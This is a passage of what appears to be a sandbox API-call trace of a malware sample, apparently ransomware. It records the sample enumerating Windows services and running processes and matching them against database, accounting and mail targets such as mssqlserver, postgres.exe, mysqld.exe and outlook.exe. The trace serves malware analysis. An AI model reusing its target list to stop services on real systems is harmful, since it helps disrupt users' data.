lpServices=0xba5bf8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xba5bf8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0042.928] CloseServiceHandle (hSCObject=0x4232e28) returned 1 [0042.928] lstrlenW (lpString="Appinfo") returned 7 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0042.928] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0042.928] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0042.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0042.928] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0042.928] lstrlenW (lpString="AudioSrv") returned 8 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0042.928] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0042.928] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0042.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0042.928] lstrlenW (lpString="BFE") returned 3 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0042.928] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0042.928] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0042.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0042.928] lstrlenW (lpString="CryptSvc") returned 8 [0042.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0042.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0042.929] lstrlenW (lpString="CscService") returned 10 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0042.929] lstrlenW (lpString="DcomLaunch") returned 10 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0042.929] lstrlenW (lpString="Dhcp") returned 4 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0042.929] lstrlenW (lpString="Dnscache") returned 8 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0042.929] lstrlenW (lpString="DPS") returned 3 [0042.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0042.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0042.929] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0042.929] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0042.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0042.929] lstrlenW (lpString="eventlog") returned 8 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0042.930] lstrlenW (lpString="EventSystem") returned 11 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0042.930] lstrlenW (lpString="gpsvc") returned 5 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0042.930] lstrlenW (lpString="iphlpsvc") returned 8 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0042.930] lstrlenW (lpString="LanmanServer") returned 12 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0042.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0042.930] lstrlenW (lpString="LanmanWorkstation") returned 17 [0042.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.930] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0042.930] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0042.931] lstrlenW (lpString="lmhosts") returned 7 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0042.931] lstrlenW (lpString="MMCSS") returned 5 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0042.931] lstrlenW (lpString="MpsSvc") returned 6 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0042.931] lstrlenW (lpString="Netman") returned 6 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0042.931] lstrlenW (lpString="netprofm") returned 8 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0042.931] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0042.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0042.931] lstrlenW (lpString="NlaSvc") returned 6 [0042.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0042.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0042.931] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0042.932] lstrlenW (lpString="nsi") returned 3 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0042.932] lstrlenW (lpString="PcaSvc") returned 6 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0042.932] lstrlenW (lpString="PlugPlay") returned 8 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0042.932] lstrlenW (lpString="Power") returned 5 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0042.932] lstrlenW (lpString="ProfSvc") returned 7 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0042.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0042.932] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0042.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0042.932] lstrlenW (lpString="RpcEptMapper") returned 12 [0042.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0042.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0042.933] lstrlenW (lpString="RpcSs") returned 5 [0042.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0042.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0042.933] lstrlenW (lpString="SamSs") returned 5 [0042.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0042.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0042.933] lstrlenW (lpString="Schedule") returned 8 [0042.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0042.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0042.933] lstrlenW (lpString="SENS") returned 4 [0042.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0042.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0042.933] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0042.933] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0042.934] lstrlenW (lpString="ShellHWDetection") returned 16 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0042.934] lstrlenW (lpString="Spooler") returned 7 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0042.934] lstrlenW (lpString="swprv") returned 5 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0042.934] lstrlenW (lpString="SysMain") returned 7 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0042.934] lstrlenW (lpString="Themes") returned 6 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0042.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0042.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0042.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0042.934] lstrlenW (lpString="TrkWks") returned 6 [0042.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0042.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0042.935] lstrlenW (lpString="UxSms") returned 5 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0042.935] lstrlenW (lpString="VSS") returned 3 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0042.935] lstrlenW (lpString="WdiServiceHost") returned 14 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0042.935] lstrlenW (lpString="WdiSystemHost") returned 13 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0042.935] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0042.935] lstrlenW (lpString="Winmgmt") returned 7 [0042.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0042.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0042.936] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0042.936] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0042.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0042.936] lstrlenW (lpString="WPDBusEnum") returned 10 [0042.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0042.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0042.936] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0042.936] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0042.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0042.936] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xba5bf8 | out: hHeap=0xb10000) returned 1 [0042.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f8 [0042.938] Process32FirstW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0042.939] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0042.940] lstrlenW (lpString="System") returned 6 [0042.940] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0042.940] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0042.940] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0042.940] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0042.940] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0042.940] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0042.940] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0042.940] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0042.941] lstrlenW (lpString="smss.exe") returned 8 [0042.941] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0042.941] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0042.941] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0042.941] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0042.941] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0042.941] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0042.941] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0042.941] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.942] lstrlenW (lpString="csrss.exe") returned 9 [0042.942] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0042.942] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0042.942] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0042.942] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0042.942] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0042.942] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0042.942] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0042.942] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0042.943] lstrlenW (lpString="wininit.exe") returned 11 [0042.943] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0042.943] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0042.943] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0042.943] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.944] lstrlenW (lpString="csrss.exe") returned 9 [0042.944] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0042.944] lstrlenW (lpString="winlogon.exe") returned 12 [0042.944] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0042.945] lstrlenW (lpString="services.exe") returned 12 [0042.945] Process32NextW (in: hSnapshot=0x1f8, lppe=0x282fd34 | out: 